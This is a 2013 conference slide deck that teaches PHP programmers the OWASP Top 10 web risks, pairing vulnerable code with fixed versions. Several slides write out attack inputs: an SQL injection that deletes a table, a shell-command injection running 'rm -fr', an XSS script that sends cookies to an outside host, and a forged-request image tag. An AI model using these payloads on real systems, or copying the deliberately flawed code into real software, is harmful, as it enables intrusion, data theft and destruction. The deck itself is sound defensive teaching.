OWASP TOP 10 PHP Security Risks

Follow this topic:
@rjsmelo, #owasp, #php, #appsec
OWASP TOP 10 for PHP
programmers
RICARDO MELO
Presented at #PHPLX – 11 September 2013

@rjsmelo 2
RICARDO MELO
● CTO @ DRI
● PHP, Mysql, Linux and lots of other
OSS
● ZCE, RHCE, LPI 3, ITIL, etc
● +10 years building (and breaking)
things

@rjsmelo 3
About
● 14 Year old academic spin-off
● Pragmatic OSS Orientation
● PHP, Mysql, SugarCRM, Drupal,
JavaScript, Linux, etc.
● Crafters, Integrators
● Always looking for software developers
– Yes, right now!

1999 - 2013 DRI. Some Rights Reserved
.
4
Outline
● OWASP
● OWASP TOP 10
● What's Next
● Conclusions

.
5
What is OWASP?
● Open Web Application Security Project
● World wide non-for-profit
● Focus on security improvement and
awareness
● Very active community
● Lots of projects (you can start yours)

.
6
What is OWASP TOP 10
● The name is “The Top 10 Most Critical
Web Application Risks”
● The focus is awareness
● Released 2003, 2004, 2007, 2010 and
2013
https://www.owasp.org/index.php/Top_10_2013

.
7
Risk ?
Thread Agent Attack Vectors Weakness
Prevalence
Weakness
Detectability
Technical
Impacts
Business
Impacts
Application
Specific
EASY WIDESPREAD EASY SEVERE Application /
Business
Specific
AVERAGE COMMON AVERAGE MODERATE
DIFFICULT UNCOMMON DIFFICULT MINOR

.
8
OWASP TOP 10 - 2013
● A1 – Injection
● A2 – Broken Authentication and Session
Management
● A3 – Cross-site Scripting (XSS)
● A4 – Insecure Direct Object References
● A5 – Security Misconfiguration
● A6 – Sensitive Data Exposure
● A7 – Missing Function Level Access Control
● A8 – Cross Site Request Forgery (CSRF)
● A9 – Using Components with Known Vulnerabilities
● A10 – Unvalidated Redirects and Forwards

.
9
A1 - Injection
● Occurs when untrusted data is sent
directly to the interpreter!
● Not only SQL: NoSQL, Ldap, OS, XML,
Xpath!
● Never, NEVER trust ANY input!

.
10
A1 – Injection Examples - SQL
<?php
// prune to sql injection
// script.php?start_record=20
$db = new PDO('mysql:host=localhost;dbname=testdb',
'username',
'password');
$stmt = $db->query(
"SELECT * FROM some_table limit "
. $_REQUEST['start_record']
. ",10");
$result = $stmt->fetchAll(PDO::FETCH_ASSOC);
echo function_to_render_result($result);
// what if I set record = "1; delete from some_table; -- "
<?php
// script.php?start_record=20
$db = new PDO('mysql:host=localhost;dbname=testdb',
'username',
'password');
$stmt = $db->prepare("SELECT * FROM some_table limit ?,10");
$stmt->execute(array($_REQUEST['start_record']));
$result = $stmt->fetchAll(PDO::FETCH_ASSOC);
echo function_to_render_result($result);

.
11
A1 - Injection Samples - OS
<?php
// script.php?file=xpto.pdf
$fileType = exec( "file " . $_REQUEST['file']);
echo $fileType;
// but one can try with "xpto.pdf; rm -fr /some/folder"
<?php
// script.php?file=xpto.pdf
$fileType = exec( "file " . escapeshellarg($_REQUEST['file']));
echo $fileType;

.
12
A2 – Broken Authentication and Session Management
● Broken implementations allowing
attacker to assume “other” user's
identity!
● Can be session hijack/fixation
● Broken authentication
● Or other fails that lead to compromise
passwords / keys / session tokens

.
13
A2 – Session Fixation
<?php
// Prune to session fixation
// [ ... ]
$userDetails = check_credentials($username, $password);
if ( $userDetails !== false ) {
$_SESSION['userIsLoggedin'] = true;
$_SESSION['userInformation'] = $userDetails;
}
// [ ... ]
<?php
// [ ... ]
$userDetails = check_credentials($username, $password);
if ( $userDetails !== false ) {
session_regenerate_id();
$_SESSION['userIsLoggedin'] = true;
$_SESSION['userInformation'] = $userDetails;
}
// [ ... ]

.
14
A3 – Cross-Site Scripting (XSS)
● Whenever untrusted data is sent to the
browser without proper validation and
escaping!
● XSS allows the attacker to OWN the
victims browser and do ... everything!
● Stored, Reflected and DOM based
XSS

.
15
A3 – steal user cookie
<?php
// page prune to XSS
// script.php?search=hello
$results = some_search_function($_REQUEST['search']);
?>
<html>
<body>
<p>results for : <?= $_REQUEST['search']; ?>
<?= render_results($results); ?>
</body>
</html>
// set search to:
"<script>document.location='http://www.example.com/precious_cookie
?cookie='+document.cookie</script>"
<?php
// page prune to XSS
// script.php?search=hello
$results = some_search_function($_REQUEST['search']);
?>
<html>
<body>
<p>results for : <?=
htmlentities($_REQUEST['search'],ENT_COMPAT|ENT_HTML401,'UTF-8'); ?>
<?= render_results($results); ?>
</body>
</html>

.
16
A4 – Insecure Direct Object Reference
● Whenever developer exposes
references to internal objects and don't
have proper access control.
● Attackers can change the references
and access resources that shouldn't be
accessible.

.
17
A4 – Access other user account
<?php
// prune to insecure direct reference
// script.php?account=10
$accountId = intval($_REQUEST['account']);
$account = new Account($accountId);
echo render_account_info($account);
// and if I change account to "9" ?
<?php
// script.php?account=10
$user = new User($_SESSION['userInfo']);
$accountId = intval($_REQUEST['account']);
$account = new Account($accountId);
if ( $account->canRead($user)) {
echo render_account_info($account);
} else {
echo "Access denied";
}

.
18
A5 – Security Misconfiguration
● Often fails in securing the full stack
leads to application / servers being
compromised.
● Take into consideration other services /
applications running in the same
infrastructure
● Watch out for outdated software
● Watch out for default accounts

.
19
A6 – Sensitive Data Exposure
● Whenever sensitive data isn't properly
protected allowing attackers to steal or
modify that information.
● Credit Card fraud, Identity theft, etc!
● Be aware, data should be protected
both in transit or on the storage engine
(don't forget the backups)

.
20
A7 – Missing Function Level Access Control
● Most applications validate function
based access control before displaying
options in UI, but fail to validate when
the function is accessed.
● Attacker can forge request to functions
that shouldn't be available

.
21
A7 – insecure function
<?php
// prune to insecure function access
// script.php?user=john&action=read
$userId = $_REQUEST['user'];
$action = $_REQUEST['action'];
$user = new User($userId);
switch($action) {
case 'read':
echo render_user($user);
break;
case 'delete':
$user->delete();
echo "user Deleted";
break;
}
// and if I change action to "delete"?
<?php
$userId = $_REQUEST['user'];
$action = $_REQUEST['action'];
$loggedUser = new AppUser($_SESSION['userInfo']);
$user = new User($userId);
switch($action) {
case 'read':
if ( $user->canRead($loggedUser) ){
echo render_user($user);
}
break;
case 'delete':
if ( $user->canDelete($loggedUser) ){
$user->delete();
echo "user Deleted";
}
break;
}

.
22
A8 – Cross Site Request Forgery (CSRF)
● CSRF forces a victim's browser to send
a forged HTTP request to a vulnerable
web application (normally taking
advantage of an existing user session)
● No difference from user generated
requests!

.
23
A8 – delete user
<?php
// vulnerable app
// delete.php?id=123
$id = intval($_REQUEST['id']);
$user = new User($id);
$user->delete();
}
?>
// attackers site:
<img src="http://www.example.com/users/delete.php?id=123" />
<?php
// vulnerable app
$id = intval($_REQUEST['id']);
$user = new User($id);
if (validate_token($_REQUEST['token'])) {
$user->delete();
}
}

.
24
A9 – Using Components with know Vulnerabilities
● Whenever you use libraries,
frameworks, or other software modules
with known vulnerabilities.
● Attackers can leverage this issues to
attack your application / server / etc.

.
25
A10 – Unvalidated Redirects and Forwards
● Web application often redirects users
to other pages, using untrusted data to
determine the destination pages.
● Atackers can redirect victims to
phishing or malware pages or use
forwards to access unauthorized
pages.

.
26
A10 – “simple” Forward
<?php
class someController extends baseController {
public function preFunction($args,$action)
{
$this->checkAccess($args, $action);
}
public function indexAction($args)
{
// [...] do something here
if ( $args['callback'] && method_exists($this,$args['callback'])){
unset($args['callback']);
call_user_func_array(array($this,$args['callback']),$args);
}
return $response;
}
public function destroyAction($args)
{
$this->selfTerminate();
}
}
if ( $args['callback'] && method_exists($this,$args['callback'])){
$this->preFunction($args,$args['callback']);
unset($args['callback']);
call_user_func_array(array($this,$args['callback']),$args);
}

.
27
What's Next For PHP Programmers
● OWASP
– http://goo.gl/lVRRY
● Cheat Sheets
– http://goo.gl/lVRRY
● OWASP Zed Attack Proxy
– http://goo.gl/QE5v1H
● OWASP Books – free
– http://goo.gl/aLx1q2

.
28
Conclusions
● Keep the application secure is a
continuous process
● Avoiding the TOP 10 Risks don't make
your application secure, but is already
a HUGE step forward.
● Don't trust ANY input! Escape every
output!

Follow this topic:
@rjsmelo, #owasp, #php, #appsec
QA
Feedback: https://joind.in/9107

www.dri-global.com
@rjsmelo
ricardo.melo@dri-global.com

OWASP TOP 10 PHP Security Risks

Recommandé

Recommandé

Contenu connexe

Tendances

Tendances (20)

Similaire à OWASP TOP 10 PHP Security Risks

Similaire à OWASP TOP 10 PHP Security Risks (20)

Plus de rjsmelo

Plus de rjsmelo (7)

Dernier

Dernier (20)

OWASP TOP 10 PHP Security Risks